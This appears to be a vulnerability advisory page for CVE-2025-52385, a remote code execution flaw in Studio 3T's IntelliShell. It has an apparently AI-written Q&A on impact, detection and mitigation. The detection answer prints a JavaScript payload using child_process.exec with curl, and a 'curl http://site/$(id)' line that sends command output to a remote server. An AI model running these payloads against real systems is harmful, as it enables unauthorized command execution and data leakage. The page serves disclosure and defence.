CVE-2025-52385
BaseFortify
Publication date: 2025-08-13
Last updated on: 2025-08-14
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| studio3t | studio_3t | 2025.1.0 |
| studio3t | studio_3t | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-52385 is a critical remote code execution vulnerability in Studio 3T version 2025.1.0 and earlier. It occurs because the IntelliShell component allows attackers to send a crafted JavaScript payload that exploits the Node.js child_process module to execute arbitrary operating system commands remotely. The attacker injects malicious code through IntelliShell, which uses child_process.exec to run OS commands without proper input validation or sanitization. This is a blind execution vulnerability, meaning the attacker does not receive direct output from the commands executed. [1]
How can this vulnerability impact me? :
This vulnerability can lead to remote code execution, allowing attackers to run arbitrary commands on the affected system. Potential impacts include denial of service, privilege escalation, and unauthorized control over the system. Attackers can exploit this flaw to compromise system integrity, confidentiality, and availability by executing malicious commands remotely. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to execute a crafted JavaScript payload through the IntelliShell component of Studio 3T that uses the child_process.exec function to run OS commands remotely. For example, running a payload like `const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));` can help verify if arbitrary command execution is possible. Alternatively, commands such as `curl http://site/$(id)` can be used to confirm exploitation by observing if the remote server receives the request, indicating command execution. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include upgrading Studio 3T to a patched version once available, or avoiding the use of IntelliShell with untrusted MongoDB connections. Additionally, vendors should restrict or sanitize inputs to the child_process module within IntelliShell to prevent unauthorized command execution. From a broader perspective, applying strict input validation, avoiding dynamic code generation, and using sandboxing techniques can help reduce the risk of code injection vulnerabilities. [1, 2]